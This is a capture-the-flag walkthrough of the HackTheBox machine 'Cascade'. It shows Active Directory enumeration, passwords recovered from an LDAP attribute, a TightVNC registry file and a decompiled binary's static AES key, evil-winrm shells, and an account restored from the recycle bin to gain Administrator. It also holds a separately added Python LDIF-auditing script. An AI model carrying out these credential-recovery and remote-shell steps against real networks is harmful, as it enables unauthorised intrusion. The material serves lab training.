HackTheBox - Cascade


Summary

Cascade
Difficulty: Medium
OS: Windows
Release date: 28-03-2020

Cascade was a medium Windows machine that involved a lot of SMB and LDAP enumeration. User access was obtained through decryption of a password found in a TightVNC registry file. Privilege escalation and recovering an object from the AD recycle bin granted administrator access.

Foothold

An Nmap scan revealed that this was a machine within an Active Directory (AD) environment with “cascade.local” as its domain.

mick@kali:~/Documents/HackTheBox/Cascade$ nmap -sC -sV -Pn -oN nmap_cascade 10.10.10.182
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-03 13:25 CEST
Host is up (0.032s latency).
Not shown: 989 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-04-14T15:56:03
|_  start_date: 2020-04-14T12:07:18

To gather more information about the users on this system I ran ldapsearch. This produced a huge amount of output that I had to sift through. While looking through the output I stumbled upon an interesting property for “Ryan Thompson”.

mick@kali:~/Documents/HackTheBox/Cascade$ ldapsearch -x -H ldap://10.10.10.182 -b "dc=cascade,dc=local" >> ldapsearch_cascade
...

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=

...

The last property ‘cascadeLegacyPwd’ had the value “clk0bjVldmE=”. This is Base64 encoded and decodes to ‘rY4n5eva’. The username ‘r.thompson’ in combination with the password ‘rY4n5eva’ granted me access to the machine and allowed me to retrieve a share listing.

mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U r.thompson%rY4n5eva  -L \\\\10.10.10.182\\

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk      
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
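As an added audit example (not part of the original writeup), the Python below parses ldapsearch LDIF output like the r.thompson entry above: it decodes the '::' base64 raw attributes (objectSid into its S-1-5-21 form) and flags any string attribute whose value base64-decodes to printable text, which is exactly how a custom attribute such as cascadeLegacyPwd leaks a credential. The sample entry is a constructed, trimmed copy of the record shown above; the function names are my own.

```python
import base64
import re
import struct

# Constructed sample: a trimmed copy of the r.thompson entry from the ldapsearch output above.
SAMPLE_LDIF = """\
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=
"""

def parse_ldif(text):
    """Map each entry to {attribute: [values]}. LDIF writes binary values with '::'
    (decoded to bytes here); ': ' values stay str; leading-space lines are folded."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:          # sentinel blank line closes the last entry
        if not line:
            if current:
                entries.append(current)
                current = {}
        elif not line.startswith("#"):
            attr, sep, value = re.match(r"([^:]+)(::?) ?(.*)", line).groups()
            current.setdefault(attr, []).append(base64.b64decode(value) if sep == "::" else value)
    return entries

def sid_to_string(blob):
    """Binary SID -> 'S-1-5-21-...': revision, sub-authority count, 48-bit big-endian
    identifier authority, then little-endian 32-bit sub-authorities (the last is the RID)."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack("<%dI" % count, blob[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def looks_like_encoded_secret(value):
    """True for well-formed base64 that decodes to short printable ASCII: the shape of a
    password parked in a custom attribute, as cascadeLegacyPwd is on this box."""
    if not re.fullmatch(r"[A-Za-z0-9+/]{8,}={0,2}", value):
        return False
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:                  # binascii.Error is a ValueError subclass
        return False
    return 4 <= len(raw) <= 64 and all(32 <= b < 127 for b in raw)

def audit_entries(entries):
    """Return (dn, attribute, decoded text) for every string attribute that hides base64 text."""
    findings = []
    for entry in entries:
        dn = entry.get("dn", ["?"])[0]
        for attr, values in entry.items():
            for v in values:
                if isinstance(v, str) and looks_like_encoded_secret(v):
                    findings.append((dn, attr, base64.b64decode(v).decode("ascii")))
    return findings
```

Run it over a full ldapsearch dump to get one line per suspicious attribute instead of sifting through the whole output by hand.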

User access

After enumerating the contents of several shares I stumbled upon several interesting files in the “Data” share.

mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U r.thompson%rY4n5eva \\\\10.10.10.182\\Data
Try "help" to get a list of possible commands.
smb: \> cd IT
smb: \IT\> cd Temp
smb: \IT\Temp\> ls
  .                                   D        0  Tue Jan 28 23:06:59 2020
  ..                                  D        0  Tue Jan 28 23:06:59 2020
  r.thompson                          D        0  Tue Jan 28 23:06:53 2020
  s.smith                             D        0  Tue Jan 28 21:00:01 2020

                13106687 blocks of size 4096. 7793884 blocks available

smb: \IT\Temp\> cd s.smith
smb: \IT\Temp\s.smith\> ls
  .                                   D        0  Tue Jan 28 21:00:01 2020
  ..                                  D        0  Tue Jan 28 21:00:01 2020
  VNC Install.reg                     A     2680  Tue Jan 28 20:27:44 2020

                13106687 blocks of size 4096. 7793884 blocks available
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (8.0 KiloBytes/sec) (average 15.9 KiloBytes/sec)

mick@kali:~/Documents/HackTheBox/Cascade$ cat 'VNC Install.reg' 
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

...

These appear to be registry keys belonging to TightVNC. After doing some research about registry keys I found out that hex values in a .reg file are simply comma-delimited:

“Value B”=hex:<Binary data (as comma-delimited list of hexadecimal values)> - [ https://en.wikipedia.org/wiki/Windows_Registry#.REG_files ]

Removing the commas and converting the hex representation to readable text gave me gibberish, which hinted to me that the password is encrypted. According to this source, the password is encrypted with DES. It was worth a try since there are already tools available for this. I first stored the raw bytes in a file called ‘passwd’ and then successfully decrypted it using this tool.

mick@kali:~/Documents/HackTheBox/Cascade/vncpwd$ echo 6bcf2a4b6e5aca0f | xxd -r -p >> passwd

mick@kali:~/Documents/HackTheBox/Cascade/vncpwd$ ./vncpwd passwd
Password: sT333ve2

I successfully authenticated as user ‘s.smith’ since I was able to list the machine’s shares.

mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U s.smith%sT333ve2 -L \\\\10.10.10.182\\

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk      
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 

An attempt to get a shell as ‘s.smith’ with evil-winrm was also successful, which meant I had obtained user access.

mick@kali:~/Documents/HackTheBox/Cascade$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\s.smith\Documents> ls


    Directory: C:\Users\s.smith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/25/2020   8:22 AM          32976 mabite.bat

*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat user.txt
94a79f36313198604c70c1c575f008b7

Root access

Root access was not straightforward and required an additional privilege escalation to the user ‘ArkSvc’.

Privilege escalation to ArkSvc

I connected to the ‘Audit$’ share as ‘s.smith’ and found a database file in the ‘DB’ folder. With that I also downloaded ‘CascAudit.exe’ and ‘CascCrypto.dll’ since these could be useful.

mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U s.smith%sT333ve2 \\\\10.10.10.182\\Audit$
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 19:01:26 2020
  ..                                  D        0  Wed Jan 29 19:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 22:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 19:00:20 2020
  DB                                  D        0  Tue Jan 28 22:40:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 00:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 07:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 07:38:38 2019
  x64                                 D        0  Sun Jan 26 23:25:27 2020
  x86                                 D        0  Sun Jan 26 23:25:27 2020

smb: \> get CascAudit.exe
smb: \> get CascCrypto.dll
smb: \> cd DB
smb: \DB> get Audit.db


mick@kali:~/Documents/HackTheBox/Cascade/AUDIT_share$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002

To browse through the ‘Audit.db’ file I opened it in SQLite Browser.

sqlite_browser.png

The table ‘Ldap’ contained credentials for the user ‘ArkSvc’.

sqlite_browser_ldap.png

The password is Base64 encoded and decoding it produced gibberish, which (again) hinted to me that this password is encrypted. The files ‘CascAudit.exe’ and ‘CascCrypto.dll’ could help with decryption though. By decompiling ‘CascAudit.exe’ using ILSpy and looking at line 52, I found out that this password was encrypted with a static key.

ilspy_cascaudit.png

This ‘Crypto’ class is located in ‘CascCrypto.dll’. After decompiling ‘CascCrypto.dll’ as well, I found out all parameters that I needed for decryption.

ilspy_casccrypto.png

It was now just a matter of writing a program that decrypted the password, which I did by simply copying the decryption function and filling in the parameters.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace CascadeDecryption
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("===================================");
            Console.WriteLine("Decrypting password for ArkSvc:");
            Console.WriteLine("===================================");
            // Ciphertext from the Ldap table in Audit.db; key and IV copied from the decompiled CascCrypto.dll
            Console.WriteLine("Password: " + DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321"));
            Console.ReadKey();
        }

        // Copy of CascCrypto's DecryptString: AES-128 in CBC mode with a static key and IV,
        // PKCS7 padding (the default for Aes)
        public static string DecryptString(string EncryptedString, string Key)
        {
            byte[] array = Convert.FromBase64String(EncryptedString);
            Aes aes = Aes.Create();
            aes.KeySize = 128;
            aes.BlockSize = 128;
            aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
            aes.Mode = CipherMode.CBC;
            aes.Key = Encoding.UTF8.GetBytes(Key);
            using (MemoryStream stream = new MemoryStream(array))
            {
                using (CryptoStream cryptoStream = new CryptoStream(stream, aes.CreateDecryptor(), CryptoStreamMode.Read))
                {
                    // The plaintext is never longer than the ciphertext. Only the bytes actually
                    // read are converted, so the stripped padding does not show up as trailing NULs.
                    byte[] array2 = new byte[array.Length];
                    int count = cryptoStream.Read(array2, 0, array2.Length);
                    return Encoding.UTF8.GetString(array2, 0, count);
                }
            }
        }
    }
}

The output revealed the password ‘w3lc0meFr31nd’.

===================================
Decrypting password for ArkSvc:
===================================
Password: w3lc0meFr31nd

With these credentials I managed to set up an evil-winrm shell as ‘ArkSvc’.

mick@kali:~/Documents/HackTheBox/Cascade$ evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents>

Privilege escalation to Administrator

Since I didn’t manage to find anything particularly interesting, I decided to go back and enumerate the other SMB shares again, in particular the “Data” share.

mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U ArkSvc%w3lc0meFr31nd \\\\10.10.10.182\\Data
smb: \> cd IT
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
  .                                   D        0  Tue Jan 28 19:00:30 2020
  ..                                  D        0  Tue Jan 28 19:00:30 2020
  Meeting_Notes_June_2018.html        A     2522  Tue Jan 28 19:00:12 2020

                13106687 blocks of size 4096. 7793884 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (18.9 KiloBytes/sec) (average 18.9 KiloBytes/sec)

The content of the file revealed the existence of an account called ‘TempAdmin’.

meeting_notes.png

While looking further through the “Data” share I also discovered an interesting log file.

smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Tue Jan 28 19:04:51 2020
  ..                                  D        0  Tue Jan 28 19:04:51 2020
  Email Archives                      D        0  Tue Jan 28 19:00:30 2020
  LogonAudit                          D        0  Tue Jan 28 19:04:40 2020
  Logs                                D        0  Wed Jan 29 01:53:04 2020
  Temp                                D        0  Tue Jan 28 23:06:59 2020

smb: \IT\> cd Logs
smb: \IT\Logs\> ls
  .                                   D        0  Wed Jan 29 01:53:04 2020
  ..                                  D        0  Wed Jan 29 01:53:04 2020
  Ark AD Recycle Bin                  D        0  Fri Jan 10 17:33:45 2020
  DCs                                 D        0  Wed Jan 29 01:56:00 2020

                13106687 blocks of size 4096. 7786395 blocks available
                
smb: \IT\Logs\> cd "Ark AD Recycle bin"
smb: \IT\Logs\Ark AD Recycle bin\> ls
  .                                   D        0  Fri Jan 10 17:33:45 2020
  ..                                  D        0  Fri Jan 10 17:33:45 2020
  ArkAdRecycleBin.log                 A     1303  Wed Jan 29 02:19:11 2020

                13106687 blocks of size 4096. 7786395 blocks available
smb: \IT\Logs\Ark AD Recycle bin\> get ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (12.6 KiloBytes/sec) (average 12.6 KiloBytes/sec)

The last 6 lines in this log file told me that the user TempAdmin had been moved to the AD recycle bin.

mick@kali:~/Documents/HackTheBox/Cascade/DATA_share$ cat ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD]   Validating settings...
1/10/2018 15:43 [MAIN_THREAD]   Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD]   Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD]   Validating settings...
2/10/2018 15:56 [MAIN_THREAD]   Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD]   Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD]   Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD]   Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD]   Validating settings...
8/12/2018 12:22 [MAIN_THREAD]   Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD]   Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD]   Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD]   Exiting with error code 0

After doing some research I managed to find this useful source on recovering items from the AD recycle bin. To do this I reconnected as ‘ArkSvc’.

mick@kali:~/Documents/HackTheBox/Cascade$ evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
...
Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin
                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059
...

This command unfortunately only told me that this object had indeed been deleted. Adding the -properties * flag did give me all properties of this deleted object.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -properties *

...
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : [email protected]
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

This property ‘cascadeLegacyPwd’ contained another password that is Base64 encoded. Fortunately this password was not encrypted.

mick@kali:~/Documents/HackTheBox/Cascade/DATA_share$ echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles

This password did not work for ‘TempAdmin’. I then remembered that the meeting notes from earlier said “password is the same as the normal admin account password”. Using this password, I successfully managed to get access as Administrator.

mick@kali:~/Documents/HackTheBox/Cascade$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
39e25938654e9a9c5ce9b4a28bcfbcc9